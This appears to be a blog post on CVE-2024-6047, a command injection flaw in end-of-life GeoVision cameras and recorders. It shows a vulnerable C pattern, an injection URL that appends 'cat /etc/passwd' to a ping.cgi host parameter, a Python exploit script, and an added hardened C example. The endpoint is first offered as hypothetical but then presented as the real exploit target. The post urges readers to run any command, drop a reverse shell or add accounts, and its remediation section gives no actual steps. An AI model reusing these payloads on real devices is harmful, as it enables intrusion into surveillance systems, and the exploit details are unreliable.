GeoVision is a well-known provider of video surveillance equipment and software. However, just because a device is popular doesn’t always mean it’s secure. In fact, many Internet-connected cameras and recorders go out of support, but remain widely deployed—and dangerously vulnerable.
One recent discovery is CVE-2024-6047, a critical issue affecting specific end-of-life (EOL) GeoVision devices. In this post, I’ll break down how this vulnerability works, how attackers can exploit it, and what you can do if your organization is still running these devices.
What Is CVE-2024-6047?
CVE-2024-6047 is a command injection vulnerability found in certain EOL GeoVision devices. The vulnerability occurs because the firmware fails to properly filter or validate user input before using it in system-level commands. This means attackers can send specially crafted data to the vulnerable functionality, and the device may run attacker-chosen commands as the root user.
Vulnerable Functionality
Most IoT cameras have web interfaces for configuration. In the vulnerable GeoVision models, an HTTP API responsible for things like system configuration and diagnostics fails to sanitize input it receives. Parameters sent in the request are directly passed to system calls, opening the door to command injection.
For example, a classic vulnerable code pattern in C-like pseudocode might look like this:
```c
char cmd[256];
snprintf(cmd, sizeof(cmd), "ping %s", request->query_param);
system(cmd); // Dangerous: unsanitized user input reaches the shell
```
If the software does not restrict what gets put into cmd, an attacker can inject additional shell commands.
Let’s say the web interface has a debug endpoint like:
http://camera-ip/cgi-bin/ping.cgi?host=127.0.0.1
But it doesn’t sanitize the host parameter. An attacker could make a request like:
http://camera-ip/cgi-bin/ping.cgi?host=127.0.0.1;cat /etc/passwd
This would result in the device executing:
ping 127.0.0.1;cat /etc/passwd
The output would include the contents of /etc/passwd.
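As an added example (not code from the GeoVision firmware or from this post), here is the hardened counterpart of the snippet above: the host parameter is allow-listed and ping is started through execv() with an argument array, so no shell ever parses the value. The /bin/ping path and the single-probe "-c 1" arguments are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list the "host" parameter: letters, digits, '.' and '-' only, no
 * leading '-' (ping would take it as an option), bounded length. Shell
 * metacharacters (';', '|', '`', '$', whitespace) are rejected, not escaped. */
bool is_safe_host(const char *host)
{
    size_t n = host ? strlen(host) : 0;
    if (n == 0 || n > 253 || host[0] == '-' || host[0] == '.')
        return false;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-')
            return false;
    }
    return true;
}

/* Run ping for a validated host without a shell: execv() takes an argv array,
 * so the host is one argument and is never re-parsed. Returns -1 if the input
 * is rejected (nothing runs), -2 if fork() fails, else ping's wait status. */
int safe_ping(const char *host)
{
    if (!is_safe_host(host))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -2;
    if (pid == 0) {
        char *const argv[] = {"ping", "-c", "1", (char *)host, NULL};
        execv("/bin/ping", argv);  /* assumed fixed path, no PATH lookup */
        _exit(127);                /* only reached if exec fails */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return status;
}

int main(void)
{
    const char *probe[] = {"127.0.0.1", "127.0.0.1;cat /etc/passwd", "-c 1000"};
    for (int i = 0; i < 3; i++)
        printf("%-28s -> %s\n", probe[i], is_safe_host(probe[i]) ? "accepted" : "rejected");
    return 0;
}
```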
Exploit Example
Below is a simple Python script that demonstrates this unauthenticated exploit. (Note: Do not use this on devices you don't own or have permission to test.)
```python
import requests

TARGET_IP = "192.168.1.100"
COMMAND = "cat /etc/passwd"  # Example command

# Craft payload with command injection
payload = "127.0.0.1;" + COMMAND
url = f"http://{TARGET_IP}/cgi-bin/ping.cgi"
params = {"host": payload}

# Send the malicious request
resp = requests.get(url, params=params)
print(resp.text)  # Output from the injected command
```
Replace cat /etc/passwd with any command you want to execute on the target. With this vulnerability, you can escalate further, drop a reverse shell, or add your own accounts.
Who’s At Risk?
- Organizations using older GeoVision DVRs, NVRs, or cameras—especially if they’ve exposed them to the Internet.
- Anyone unaware that their devices have reached EOL status and are no longer receiving security updates.
Remediation and Mitigation
*GeoVision has discontinued these devices and will NOT be providing patches.*
References and Further Reading
- Official GeoVision Support: https://www.geovision.com.tw/support
- Device EOL List: GeoVision EOL Products.pdf
- CVE Entry: NIST NVD - CVE-2024-6047
- Rapid7 IoT Security Guide
Conclusion
CVE-2024-6047 serves as a sharp reminder that end-of-life gear—especially when exposed to the Internet—becomes a playground for attackers. If you’re running aging GeoVision equipment, it’s time to take inventory and move to safer ground. Vulnerabilities in products like these will only get worse with time, not better.
Stay safe, decommission those old cameras, and keep your network secure!
Timeline
Published on: 06/17/2024 06:15:09 UTC
Last modified on: 08/01/2024 22:15:39 UTC